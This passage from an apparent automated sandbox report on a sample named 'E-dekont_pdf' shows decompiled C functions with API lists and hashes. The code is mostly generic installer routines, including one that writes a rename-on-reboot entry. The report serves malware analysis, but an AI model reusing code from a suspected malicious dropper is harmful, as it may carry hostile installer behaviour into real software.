				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x470270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x468260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x470268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                              0x0040100a
                                                                                              0x00401039
                                                                                              0x00401047
                                                                                              0x0040104d
                                                                                              0x00401051
                                                                                              0x0040105b
                                                                                              0x00401061
                                                                                              0x00401064
                                                                                              0x004010f3
                                                                                              0x00401089
                                                                                              0x0040108c
                                                                                              0x004010a6
                                                                                              0x004010bd
                                                                                              0x004010cc
                                                                                              0x004010cf
                                                                                              0x004010d5
                                                                                              0x004010d9
                                                                                              0x004010e4
                                                                                              0x004010ed
                                                                                              0x004010ef
                                                                                              0x004010ef
                                                                                              0x00401100
                                                                                              0x00401105
                                                                                              0x0040110d
                                                                                              0x00401110
                                                                                              0x00401112
                                                                                              0x00401118
                                                                                              0x0040111f
                                                                                              0x00401126
                                                                                              0x00401130
                                                                                              0x00401142
                                                                                              0x00401156
                                                                                              0x00401160
                                                                                              0x00401165
                                                                                              0x00401165
                                                                                              0x00401110
                                                                                              0x0040116e
                                                                                              0x00000000
                                                                                              0x00401178
                                                                                              0x00401010
                                                                                              0x00401013
                                                                                              0x00401015
                                                                                              0x0040101f
                                                                                              0x0040101f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,00468260,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 859ad4d5c908954c302fd5f6e87201aa3f7da17d0dd271069c6d7a5b51f09617
                                                                                              • Instruction ID: c62f1c1f376d9ee0d7800d9465679141f30c6f5e77cc96b9ae53903d71277972
                                                                                              • Opcode Fuzzy Hash: 859ad4d5c908954c302fd5f6e87201aa3f7da17d0dd271069c6d7a5b51f09617
                                                                                              • Instruction Fuzzy Hash: DD418B72800209EFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB349A55DFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062AE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 130memorystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x45ede8 = 0x55004e;
				 *0x45edec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x45f5e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x45e9e8, "%ls=%ls\r\n", 0x45ede8, 0x45f5e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x45f5e8, 0x45f5e8,  *((intOrPtr*)( *0x470270 + 0x128)));
						_t12 = E00406158(0x45f5e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x45e9e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, "true"));
					_t12 = GetShortPathNameW(_t44, 0x45ede8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                              0x004062ae
                                                                                              0x004062b7
                                                                                              0x004062be
                                                                                              0x004062c8
                                                                                              0x004062dc
                                                                                              0x00406304
                                                                                              0x0040630f
                                                                                              0x00406313
                                                                                              0x00406333
                                                                                              0x0040633a
                                                                                              0x00406344
                                                                                              0x00406351
                                                                                              0x00406356
                                                                                              0x0040635b
                                                                                              0x0040635f
                                                                                              0x0040636e
                                                                                              0x00406370
                                                                                              0x0040637d
                                                                                              0x00406381
                                                                                              0x0040641c
                                                                                              0x00000000
                                                                                              0x00406397
                                                                                              0x004063a4
                                                                                              0x004063c8
                                                                                              0x004063cc
                                                                                              0x004063eb
                                                                                              0x004063ef
                                                                                              0x004063ef
                                                                                              0x004063f1
                                                                                              0x004063fa
                                                                                              0x00406405
                                                                                              0x00406410
                                                                                              0x00406416
                                                                                              0x00000000
                                                                                              0x00406416
                                                                                              0x004063ce
                                                                                              0x004063d1
                                                                                              0x004063dc
                                                                                              0x004063d8
                                                                                              0x004063da
                                                                                              0x004063db
                                                                                              0x004063db
                                                                                              0x004063e3
                                                                                              0x004063e5
                                                                                              0x00000000
                                                                                              0x004063e5
                                                                                              0x004063af
                                                                                              0x004063b5
                                                                                              0x00000000
                                                                                              0x004063b5
                                                                                              0x00406381
                                                                                              0x0040635f
                                                                                              0x004062de
                                                                                              0x004062e9
                                                                                              0x004062f2
                                                                                              0x004062f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004062f6
                                                                                              0x00406427

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                              • GetShortPathNameW.KERNEL32(?,0045EDE8,00000400), ref: 004062F2
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              • GetShortPathNameW.KERNEL32(?,0045F5E8,00000400), ref: 0040630F
                                                                                              • wsprintfA.USER32 ref: 0040632D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0045F5E8,C0000000,00000004,0045F5E8,?,?,?,?,?), ref: 00406368
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045E9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,004DD000,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                              • String ID: %ls=%ls$[Rename]$E
                                                                                              • API String ID: 2171350718-3393067000
                                                                                              • Opcode ID: 96ef83b9170a865a5eb3b19a585758a46a32d6a0681c1ff1afe85a7ee5a2d144
                                                                                              • Instruction ID: 42b546fa1c951d9ababbdf363c054459f9c5d3fee4263add73be13c6f7e09851
                                                                                              • Opcode Fuzzy Hash: 96ef83b9170a865a5eb3b19a585758a46a32d6a0681c1ff1afe85a7ee5a2d144
                                                                                              • Instruction Fuzzy Hash: 66314531100315BBD2206B619D48F5B3AACEF85705F16003AFE02FA2C3EA7CD92586BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                              0x0040463d
                                                                                              0x004046f3
                                                                                              0x00000000
                                                                                              0x004046f3
                                                                                              0x0040464e
                                                                                              0x00404652
                                                                                              0x00000000
                                                                                              0x0040466c
                                                                                              0x0040466c
                                                                                              0x00404675
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404677
                                                                                              0x00404683
                                                                                              0x00404686
                                                                                              0x00404686
                                                                                              0x0040468c
                                                                                              0x00404692
                                                                                              0x00404692
                                                                                              0x0040469e
                                                                                              0x004046a4
                                                                                              0x004046ab
                                                                                              0x004046ae
                                                                                              0x004046b1
                                                                                              0x004046b3
                                                                                              0x004046b3
                                                                                              0x004046bb
                                                                                              0x004046c1
                                                                                              0x004046c1
                                                                                              0x004046cb
                                                                                              0x004046d0
                                                                                              0x004046d3
                                                                                              0x004046d8
                                                                                              0x004046db
                                                                                              0x004046db
                                                                                              0x004046eb
                                                                                              0x004046eb
                                                                                              0x00000000
                                                                                              0x004046ee

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                              • GetSysColor.USER32(00000000), ref: 00404686
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                              • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                              • GetSysColor.USER32(?), ref: 004046B1
                                                                                              • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                              • DeleteObject.GDI32(?), ref: 004046DB
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x4326fc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x4326fc = 0;
					return _t15;
				}
				__eflags =  *0x4326fc; // 0x0
				if(__eflags != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x47026c;
				if(_t6 >  *0x47026c) {
					__eflags =  *0x470268;
					if( *0x470268 == 0) {
						_t7 = CreateDialogParamW( *0x470260, 0x6f, 0, E00402F93, 0);
						 *0x4326fc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x470314 & 0x00000001;
					if(( *0x470314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                              0x0040303d
                                                                                              0x0040303f
                                                                                              0x00403046
                                                                                              0x00403049
                                                                                              0x00403049
                                                                                              0x0040304f
                                                                                              0x00000000
                                                                                              0x0040304f
                                                                                              0x00403057
                                                                                              0x0040305d
                                                                                              0x00000000
                                                                                              0x00403060
                                                                                              0x00403067
                                                                                              0x0040306d
                                                                                              0x00403073
                                                                                              0x00403075
                                                                                              0x0040307b
                                                                                              0x004030b9
                                                                                              0x004030c2
                                                                                              0x00000000
                                                                                              0x004030c7
                                                                                              0x0040307d
                                                                                              0x00403084
                                                                                              0x00403095
                                                                                              0x00000000
                                                                                              0x004030a3
                                                                                              0x00403084
                                                                                              0x004030cf

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                              • GetTickCount.KERNEL32 ref: 00403067
                                                                                              • wsprintfW.USER32 ref: 00403095
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                • Part of subcall function 00403012: MulDiv.KERNEL32(0001587A,00000064,00017E0E), ref: 00403027
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 722711167-2449383134
                                                                                              • Opcode ID: 0b3e7ea3853f6bf65c1bb317b541ac4268fb987cba9b9e38bfbb6309c77d8601
                                                                                              • Instruction ID: d0b0674b86f3708cac1fb91578ec3f8672b393e5989b1c53146f6732e99da21d
                                                                                              • Opcode Fuzzy Hash: 0b3e7ea3853f6bf65c1bb317b541ac4268fb987cba9b9e38bfbb6309c77d8601
                                                                                              • Instruction Fuzzy Hash: 6501A170413614EBC721BF60AE09E6A3F6CAB00B06F10417BF445B11E9DA784A44DB9E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                              0x00404f8d
                                                                                              0x00404f9a
                                                                                              0x00404fa0
                                                                                              0x00404fde
                                                                                              0x00404fde
                                                                                              0x00404fed
                                                                                              0x00404ff4
                                                                                              0x00000000
                                                                                              0x00404ff6
                                                                                              0x00404fa2
                                                                                              0x00404fb1
                                                                                              0x00404fb9
                                                                                              0x00404fbc
                                                                                              0x00404fce
                                                                                              0x00404fd4
                                                                                              0x00404fdb
                                                                                              0x00000000
                                                                                              0x00404fdb
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                              • GetMessagePos.USER32 ref: 00404FA2
                                                                                              • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
